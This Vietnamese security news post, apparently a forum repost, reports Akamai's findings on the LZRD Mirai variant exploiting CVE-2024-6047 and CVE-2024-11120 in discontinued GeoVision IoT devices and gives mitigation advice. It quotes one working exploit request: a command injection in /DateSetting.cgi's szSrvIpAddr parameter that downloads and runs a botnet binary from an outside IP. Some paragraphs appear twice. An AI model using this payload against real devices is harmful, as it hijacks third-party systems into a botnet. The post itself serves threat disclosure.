-
09/04/2020
-
95
-
778 bài viết
Cảnh báo: Thiết bị IoT GeoVision cũ đang bị botnet Mirai khai thác lỗ hổng!
Theo báo cáo mới nhất từ Akamai, hai lỗ hổng nghiêm trọng CVE-2024-6047 và CVE-2024-11120 đang bị khai thác tích cực nhắm vào các thiết bị IoT GeoVision đã ngừng sản xuất.
Kẻ tấn công nhắm vào điểm cuối /DateSetting.cgi, lợi dụng tham số szSrvIpAddr để chèn lệnh hệ thống từ xa mà không cần xác thực. Sau khi khai thác thành công, thiết bị sẽ tải và thực thi một payload độc hại- một biến thể Mirai có tên LZRD, được thiết kế riêng cho thiết bị kiến trúc ARM:
Payload được gửi qua một yêu cầu HTTP POST, biến thiết bị thành một node trong botnet LZRD. Sau khi thực thi, mã độc in ra một chuỗi nhận dạng “chữ ký” của LZRD trên thiết bị nạn nhân. Akamai xác nhận mã độc mang theo các kỹ thuật tấn công thường thấy trong dòng Mirai, bao gồm:
Botnet sử dụng LZRD không chỉ dừng lại ở các thiết bị GeoVision. Các honeypot của Akamai đã ghi nhận các nỗ lực khai thác một số lỗ hổng đã biết khác, bao gồm:
Các chuyên gia khuyến nghị tổ chức:
Kẻ tấn công nhắm vào điểm cuối /DateSetting.cgi, lợi dụng tham số szSrvIpAddr để chèn lệnh hệ thống từ xa mà không cần xác thực. Sau khi khai thác thành công, thiết bị sẽ tải và thực thi một payload độc hại- một biến thể Mirai có tên LZRD, được thiết kế riêng cho thiết bị kiến trúc ARM:
/DateSetting.cgi dwTimeZone=2&dwGainType=0&szSrvIpAddr=time.windows.com;$(cd /tmp;wget http://176.65.144[.]253/hiddenbin/boatnet.arm7;chmod 777 boatnet.arm7;./boatnet.arm7 geovision&NTP_Update_time_hh=5&NTP_Update_time_mm=10&szDateM=2024/08/07&szTimeM=14:25:16&bDateFomat=0&bDateFormatMisc=0&dwIsDelay=1&Montype=0&submit=Apply
Payload được gửi qua một yêu cầu HTTP POST, biến thiết bị thành một node trong botnet LZRD. Sau khi thực thi, mã độc in ra một chuỗi nhận dạng “chữ ký” của LZRD trên thiết bị nạn nhân. Akamai xác nhận mã độc mang theo các kỹ thuật tấn công thường thấy trong dòng Mirai, bao gồm:
- sym.attack_method_tcp
- sym.attack_udp_plain
- sym.attack_method_ovh
- sym.attack_method_stdhex
Botnet sử dụng LZRD không chỉ dừng lại ở các thiết bị GeoVision. Các honeypot của Akamai đã ghi nhận các nỗ lực khai thác một số lỗ hổng đã biết khác, bao gồm:
- Lỗ hổng Hadoop YARN
- CVE-2018-10561 (Router ZTE ZXV10 H108L)
- Lỗ hổng DigiEver IoT đã được Akamai báo cáo trước đó
Các chuyên gia khuyến nghị tổ chức:
- Loại bỏ hoặc cách ly các thiết bị IoT lỗi thời, đặc biệt là GeoVision.
- Giám sát mạng để phát hiện lưu lượng bất thường, đặc biệt các kết nối đến địa chỉ IP C2 hoặc các URL lạ.
- Chặn các URL độc hại, đặc biệt là hiddenbin/boatnet.arm7.
Theo Security Online